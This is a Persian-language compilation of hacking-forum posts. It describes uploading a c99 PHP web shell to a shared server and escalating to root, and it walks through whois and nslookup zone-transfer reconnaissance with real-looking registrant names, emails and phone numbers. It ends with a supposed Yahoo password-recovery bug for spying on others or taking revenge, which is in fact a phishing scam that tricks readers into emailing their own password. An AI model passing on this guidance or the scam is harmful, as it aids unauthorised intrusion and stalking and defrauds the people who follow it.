اولین راه برای نفوذ به سرور همراه اول کشف شد

در این روش شما با داشتن یک کارت شارژ و فرستادن آن همراه با کدی که در زیر هست به ربات سایت همراه اول باعث میشه تا یک شارژ رایگان از طرف سایت اصلی هدیه بگیرین

نام آموزش:PHP Shell چیست ؟

زمانی که شما میخواهید یک سایت را هک کنید معمولا از 3 راه وارد می شوید .
1. با روش های مهندس اجتماعی یا Pharming که با تروجان و ... انجام می شود .
2.در سایت یا سرور مورد نظر باگ پیدا می کنید .
3. از سرور مورد نظر شل میگیرید .

منظور از شل همان دسترسی از سرور است . حال چگونه باید از سایت مورد نظر دسترسی بگیریم ؟؟ چرا دسترسی میگیریم ؟؟ چه نوع دسترسی در اختیار داریم ؟؟

شما زمانی از سرور مورد نظر شل میگیرید که تمام راهای شما بسته باشد . یعنی سایت مورد نظر باگ نداشته باشد و رورش های مهندس اجتماعی که برفریب دادن انسان ها استوار است بر آن اثر نکند . در این مواقع شما باید از برنامه هایی که از سرور به شما شل می دهند کمک بگیرید .

برای اینکه بتوانید از سرور دسترسی بگیرید باید این برنامه های shell script را بر روی یکی از سایت های سرور مورد نظر آپلود کنید .
زیرا یکی از راهای هک کردن تمام شبکه ها عضو بودن در آن شبکه است . زیرا خیلی اطلاعات از شبکه را بدست می آورید و شما قادر خواهید بود بسیاری از کنترل های آن شبکه را در اختیار داشته باشید . چون یک عضو معتبر آن شبکه هستید . همین موضوع در هک کردن سرور ها هم سرایت خواهد کرد. و با داشتن یک سایت در آن سرور و آپلود کردن shell script ها بر روی آن می توانید از سرور دسترس بگیرید.( اما نه از کل سرور . ابتدا فقط از سایتی که بر روش shell scriptرو آپلود کریدن دسترسی دارین که باید دسترسی خودتونو بالا ببرید و به مقام root برسید) . (root در لینوکس همانند دسترسی administrator در ویندوز است.)
حال شما میتوانید یک سایت بر روی سرور هک کنید و یک shell scriptبر روی آن سایت آپلود کنید . یا یک سایت از آن سرور خریداری کنید . یا از یکی از دوستانتن که بر روی آن سرور هاست دارد از آن به مدت چند ساعت قرض بگیرید. تا بتوانید بر روی سرور عملیاتی برای root شدن انجام دهید .
اینکه شما بدان چگونه shell scriptباید آپلود کنید مهم است . زیرا shell scriptها به زبان های مختلفی نوشته می شوند . و بستگی دارد که سرور مورد نظر کدام را ساپورت کند . اگر سرور هدف لینوکس باشد بهتر است شما از php sheller ها که با زبان php نوشته شده اند استفاده کنید .

یکی از بهترین اینگونه php sheller ها c99 نام دادرد .
وقتی شما یک php sheller را بر روی یک سایت آپلود می کنید و آنرا اجرا می کنید , چند چیز برای شما باید مهم و الویت اول را داشته باشد

1. دسترسی مجاز به پوشه ها که در لینوکس به آن ((perm می گویند. بالا ترین دسترسی پوشه ها که perm دارد و به آن 777 هم می گویند دارای امکانات زیر می باشد :
Read - Write - Execute
یعنی شما میتوانید در پوشه بخوانید . بنویسید . تغیر بدهید و حتی یک فایل آپلود کنید . که در php shell ها دسترسی perm به صورت زیر جلوی هر پوشه یا فایل نوشته می شود .
drwxrwxrwx <==== اگر جلوی یک پوشه ای این علامت را در php shell ها دید بدانید می توانید در آن هر کاری انجام دهید . نظیر :

کپی . تغیر دادن . خواندن . نوشتن .
اگر عبارت به صورت -rwxrwxrwx <=== بود بدانید آن فایل است .
نکته : شما فقط تا زمانی که دسترسی کامل ندارید با اینگونه مقررات مشکل دارید اگر دسترسی کامل داشته باشید حتی در پوشه های بدونه perm که به اینگونه نوشته می شوند :dr-xr-xr-x یا r--r--r-- و نوع های دیگر .
در c99 پوشه و فایل هایی که قابل دستکاری می باشند و یا به اصطلاحی perm هستند به رنگ سبز و بدون perm به رنگ قرمز یا سفید.

2.on یا off بودن قسمت safe-mod .زیرا اگه on باشه به عبارتی شما نمیتونید root بشید . زیرا برای روت شدن باید با comand کار کنید که اگر safe-mod on باشه نمی شه comand اجرا کرد .

خوب حالا از بالا تمام آیتم های php shller را یک بار مرور می کنیم :
در این قسمت نوع سرویس دهنده سرور و ورژن اون رو نشون می ده Softwar:
دراین قسمت اطلاعاتی در بارهی سرور میده uname -a:
اگه این قسمت off باشه شما میتونید به دایرکتوری ها برید و کامند اجرا کنید اما اگه on باشه نمی تونید safe-mod:
در این قسمت به شما نشون میده که در کدام قسمت از سایت هستید و چه نوع دسترسی داریدc:\drwxrwxrwx :

این قسمت مقدار کل فضای هارد سرور و فضای استفاده شده و باقی مانده رو نشون میده: free 5.3GB of 14.96 GB (20.6%(
این قسمت به شما درایو های سرور رو نشون می دهDEtected Dirves

Whois چيست؟
تعريف کلي براي whois نمي‌توان ارائه داد ولي فعلا منظور ما از Whois همان کسب اطلاعات در مورد يک سايت است. (قبلا با نوع خاصي از whois براي تبديل domain به ip آشنا شده‌ايد).
کاري که امروز مي‌خواهم انجام دهم کسب اطلاعات در مورد يک شماره ip و يا يک domain (مثلا irib.com ) خاص است. براي کسب اين اطلاعات بايد به اينترنت وصل شده و به‌طريقي به يک سري سايت‌هاي خاص که وظيفه ثبت domain , ... را دارند متصل شده و اطلاعات را از آنها درخواست کنم. اين سايت‌هاي خاص database (بانک‌هاي اطلاعاتي) ويژه اين وظايف را دارند. براي کسب اين اطلاعات از سايت‌ها روش‌هاي زير را مي‌توان به‌کار برد:

?- اگر از طريق سيستم عامل يونيکس يا لينوکس به اينترنت وصل شده‌ايد، دستوري به اسم whois در آنها وجود دارد. و يا مي‌توانيد از نرم‌افزارهاي خاصي که براي اين سيستم‌عامل‌ها وجود دارد (مثل Xwhois ) استفاده کنيد. ولي فعلا بحث روي ويندوز است و اين دستور در ويندوز وجود ندارد.

?- براي whois کردن در ويندوز نرم‌افزارهاي زيادي وجود دارد (که به زودي نوشتن يک whois متوسط را در زبان C ياد خواهم داد.) از مشهورترين اين نرم‌افزارها Netscan tools و SamSpade است. ولي از اينها هم فعلا صرف نظر مي‌کنم تا شما بيشتر با جزئيات اين‌ کار آشنا شويد.

?- روشي که ما در اين جلسه به کار مي‌بريم، استفاده از سايت‌هايي است که اين جستجو را براي ما انجام مي‌دهند. بحث را شروع مي‌کنم:


- datebase هاي whois در چه سايت‌هايي وجود دارد؟

تعداد زيادي از سايت‌ها اين داده‌ها را دارند که مشهورترين‌ها عبارتند از:

whois.internic. net (The InterNIC)whois. onlinenic. com (The OnLineNIC)whois. arin.net (American Registry for Internet Numbers)whois. ripe.net (European IP Address Allocations) whois.apnic. net (European IP Address Allocations) whois.nic. mil (US Military)whois. nic.gov (US Government)اولين سايت مشهورترين سايت ثبت domain براي org , net , com است.
توجه کنيد که امروزه سايت‌هاي مختلفي عمل ثبت domain را انجام مي‌دهند و براي اينکه در مورد يک سايت خاص (که در واقع يک domain خاص دارد) اطلاعاتي کسب کنيم بايد اطلاعات مربوطه را از آن سايتي بگيريم که ثبت domain را انجام داده است و چون اين کار مشکلي است به جاي استفاده از خود سايت‌هاي بالايي، از سايت‌هايي ديگر استفاده مي‌کنيم که اين کار را براي ما ساده‌تر مي‌کنند (خود آن سايت‌ها در نهايت اطلاعاتشان را از سايت‌هاي اصلي مي‌گيرند و فقط يک نقش واسط دارند... لازم به‌ذکر است که ايجاد چنين صفحات وبي زياد هم مشکل نيست.). سايت مورد علاقه من براي کسب اطلاعات سايت زير است:
http://www.samspade .org/t/whois? a=xxxxxxxxx
که بجاي xxxxxxxxx آدرس سايت و يا ip آنرا مي‌نويسيم و آدرس حاصله را در مرورگر خود مي‌بينيم. مثلا اگر بخواهم در مورد سايت sazin.com اطلاعاتي به‌دست بياورم، مي‌نويسم:
http://www.samspade .org/t/whois? a=sazin.com
و اطلاعات زير به دست مي‌آيد:
sazin.com is registered with BULKREGISTER. COM, INC. - redirecting to whois.bulkregister. com whois -h whois.bulkregister. com sazin.comThe data in Bulkregister. com"s WHOIS ............ ......... ....(deleted) SazinNetWork 2nd.Floor,Bldg# 116,Mollasadra Ave. Tehran, TEH 14358 IR Domain Name: SAZIN.COM Administrative Contact: Mohammad Hajati mjhajati@hotmail. com Sazin Rasaneh Co. 4th.Floor,Bldg. 339,Mirdamad Ave. Tehran, TEH 19696 IR Phone: +98 21 8787064 Fax: +98 21 8789841 Technical Contact: Mohammad Hajati mjhajati@hotmail. com Sazin Rasaneh Co. 4th.Floor,Bldg. 339,Mirdamad Ave. Tehran, TEH 19696 IR Phone: +98 21 8787064 Fax: +98 21 8789841 Record updated on 2002-03-02 05:47:36 Record created on 1999-05-10 Record expires on 2007-05-10 Database last updated on 2002-09-15 08:58:02 EST Domain servers in listed order: DNS.SAZIN.COM 80.78.134.221 S1.SAZIN.COM 63.148.227.63 S2.SAZIN.COM 63.148.227.64 ملاحظه مي‌کنيد که اطلاعات زيادي در مورد اين سايت را به اين طريق مي‌توان به‌دست آورد. اطلاعاتي درمورد آدرس ISP ، شخصي که به‌عنوان Admin کار ثبت را انجام داده است و ... البته باز هم نمي‌توان در مورد صحت و سقم آن اظهارنظر قطعي داشت.
تعدادي از مهمترين اطلاعات را در قسمت DNS Servers يا Domain servers (که در اين مثال در آخر قرار دارد) مي‌بينيد. بعدا در مورد اين آدرس‌ها توضيح خواهم داد ولي فعلا مي‌گم که به کمک همين چند آدرسي که در آخر به‌دست آورديم به کمک دستوري به نام nslookup مي‌توان اطلاعات با ارزش‌تري به‌دست آورد که به‌زودي ياد مي‌گيريد.


- ادامه بحث whois

قبلا در مورد ip whois و dns whois صحبت کردم. بحث dns whois (کسب اطلاعات در مورد يک domain خاص) رو ادامه مي‌دم.
از سايت SamSpade استفاده کردم. اگر اين whois رو تست کرده باشيد، مي‌دانيد که براي يک سري از domain (دامنه) ها، جواب نمي‌دهد. مثال آن سايت‌هايي است که داراي دامنه جغرافيايي مثلا ايران هستند، در مورد دامنه‌هاي جغرافيايي ايران بايد گفت که به ir. ختم مي‌شوند ( مثلا: neda.net.ir ). مثال ديگري که در whois سايت SamSpade کار نمي‌کند، تعدادي از دامنه‌هاي org , .net , .com. هستند که در internic.net ثبت نشده‌اند، بلکه در domainpeople. com ثبت شده‌اند ( مثلا sanjesh.org ). چند سال پيش ثبت domain هايي که در گروه org, net, com بودند، مختص به internic.net بود ولي الان ديگر اينطور نيست.

کاري که شما بايد براي whois کردن بايد انجام دهيد، توجه به نوع آن domain است که از نوع com است يا ir است يا biz است و ... بعد از آن از يکي از سايت‌هاي زير استفاده کنيد :

?- internic.net :
براي edu , org , net , com عالي است. براي museum , int , info , coop , biz , arpa, aero هم‌ مي‌تواند استفاده شود.
صفحه وب مربوطه عبارت‌ است از http://www.internic .net/whois. html
يا مي‌توانيد مستقيما در مرورگر بنويسيد:
http://www.internic .net/cgi/ whois?type= domain&whois_nic=xxxxxxxx که به‌جاي xxxxxxxx مثلا بايد بنويسيد: far30.com

?- nic.ir :
براي ir استفاده مي‌شود.
صفحه وب مربوطه عبارت‌ است از /http://whois. nic.ir

?- www.tv :
براي cc , info , biz , tv عالي است.
صفحه وب مربوطه عبارت‌ است از /http://www. tv
يا مي‌توانيد مستقيما در مرورگر بنويسيد:
http://www.tv/ en-def-8e33e8cf5 e3c/cgi-bin/ whois.cgi? domain=yyyyyy&tld=zzzz که اگر بخواهم مثلا hack.tv را whois کنم به‌جاي yyyyy بايد بنويسيد hack و به جاي zzzz بايد بنويسيد tv

?- domainpeople. com :
براي name , biz , info , org , net , com عالي است.
صفحه وب مربوطه عبارت‌ است از /http://whois. domainpeople. com


همانطور که ملاحظه مي‌فرماييد، org , net , com در ? و ? مشترک است. علت آن است که بعضي‌ها در اولي و بعضي‌ها در چهارمي ثبت مي‌شوند ولي براي whois کردن فرقي نمي‌کنه که شما از اولي استفاده کنيد يا چهارمي چون همديگر رو ساپورت مي‌کنند.


- چگونگي استفاده از nslookup

وقتي که DNS Server يک سايت را به‌دست آورده باشيم (از طريق whois )، به کمک دستور nslookup مي‌توان اطلاعاتي اضافي در مورد آن سايت پيدا کرد. طريقه استفاده اين دستور به صورت زير است:
فرض کنيد که من مي‌خواهم از Domain Server سايت خودم (far30.com) اطلاعاتي به‌دست بيارم. اگر به اين سايت whois کنم، مي‌بينم که دوتا Name Server يا DNS Server دارد:
s1.sazin.coms2. sazin.com
حالا ديگر آدرس DNS Server مربوط به far30.com را دارم و مي‌توانم شروع کنم:

?- دستور nslookup را در command prompt نوشته و اجرا مي‌کنم:
C:\>nslookup
و نتايج را مي‌بينم:
*** Can"t find server name for address 192.168.20.3: Non-exi...** * Can"t find server name for address 192.168.20.1: Non-exi...** * Default servers are not availableDefault Server: UnKnownAddress: 192.168.20.3 >
علامت > يعني شما مي‌توانيد دستورات را تايپ کنيد.

?- در جلوي علامت < دستور زير را تايپ مي‌کنيم:
> server dns_server
که به جاي dns_server بايد آدرس DNS Server سايت موردنظر را بنويسم. پس براي سايت far30.com مي‌شود:
> server s1.sazin.com
و جواب مي‌شنوم:
Default Server: s1.sazin.comAddress : 63.148.227.63
اگر در اين مرحله پيغام خطا مي‌گيريد، بايد دوباره اين دستور را تايپ کنيد و نيز مي‌توانيد از DNS Server دومي که در whois براي far30.com به‌دست آورديم ، استفاده کنيم.

?- دستور زير را تايپ کنيد:
> set type=any

?- حالا به کمک دستور زير اطلاعات را به‌دست مي‌آوريم:
> ls -d site_name .
که براي far30.com مي‌شود:
>ls -d far30.com.
دقت کنيد که بعد از اسم سايت يک نقطه (dot) گذاشته‌ام، شما هم بهتر است اينطوري بنويسيد.
نتايج زير حاصل مي‌شود:
[s1.sazin.com] far30.com. SOA s1.sazin.com admin.sazin. com. (2002070412 3600 600 86400 3600) far30.com. A 63.148.227.65 far30.com. NS s1.sazin.com far30.com. NS s2.sazin.com far30.com. MX 10 mail.far30.com far30.com. MX 15 far30.com ftp CNAME far30.com mail A 63.148.227.65 www CNAME far30.com far30.com. SOA s1.sazin.com admin.sazin. com. (2002070412 3600 600 86400 3600)>بعدا در مورد کاربرد تک‌تک اينها صحبت خواهم کرد ولي بعضي از آنها همين‌طوري هم اطلاعات واضحي دارند.

?- دستور exit را مقابل < تايپ کرده و از nslookup خارج مي‌شويم.
 

 mail.noavar.com

 yahoo.com

 mx1.mail.yahoo.com

 mx2.mail.yahoo.com

 mx4.mail.yahoo.com

سلام در اینجا روشی به شما یاد خواهم داد که بدون تعلیمات و دانش قبلی می توانید به راحتی پسورد یک نفر را بدست آورید.تا حالا شده بخواهید از کسی انتقام جویی بکنید یا بفهمی  کسی از نزدیکانت در یاهو چکار   می کنه؟ اگر جواب شما بله است پس به سایت درستی آمدید!!

فقط سریع باشید در بخش های بعدی توضیح می دهم چرا....

چی شده؟:

در روزهای اخیر یکی از دوستام در اصفهان یک اشکالی (BUG) درسیستم
پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) کشف کرد که هنوز توسط یاهو پیدا نشده بنابرین شما باید هر چه سریع تر از این اشکال سو استفاده کنید.

ما برای سو استفاده از چه روشی استفاده خواهیم کرد؟

ما برای گرفتن پسورد از روش سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery)  استفاده می کنیم و خود را یک مستر(MASTER) معرفی می کنیم و به سیستم فرمان می دهیم که پسورد ما را غیب کند(Hidden) و دوباره برای ما نشان دهد (Show) و بفرستد و در بین این کار از اشکال (BUG) باید        سو استفاده کنیم. ما پسورد و ID خود را به آن میدهیم و ایمیل را به شخصی که می خواهیم پسورد را بدست آوریم تغییر می دهیم در نتیجه سیستم به اشتباه پسورد قربانی را به ما می فرستد. به همین سادگی!!!!      

مزیت این روش: بدون تعلیمات و دانش قبلی می توانید به راحتی پسورد یک نفر را بدست آورید و نیازی به برنامه ندارد!

روش(بخش اصلی):

1.برید تو ایمیل خود و تو قسمت Compose.
2.در قسمت TO باید ایمیل سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) را بنویسید که هست>>>>y.forgetpass@yahoo.com<<<<<<
3.در Subject ایمیل کامل خود را بنویسید(ID@yahoo.com).
4.کدی که کمی پایین تر پیدا میکنید کپی COPY کنید و داخل پیغام خود  PASTE کنید.(اول کپی کنید بعد تغییر دهید)
5.حالا باید در کد کمی تغییر ایجاد کنیم.
6.بعد از قرار دادن کد داخل پیغام و در عوض کردن قسمت هایی که از شما (YahooID قربانی,پسورد شما,YahooID شما) خواسته شده کار شما تمام می شود.
7.حالا دکمه ی SEND را بنویسید.

این کد

(/cgi-bin/start?v703&login.{YahooID قربانی}=passmachine&class=supervisor&f={پسورد شما}&f=27586&{YahooID شما}=ACTIVE&rsa)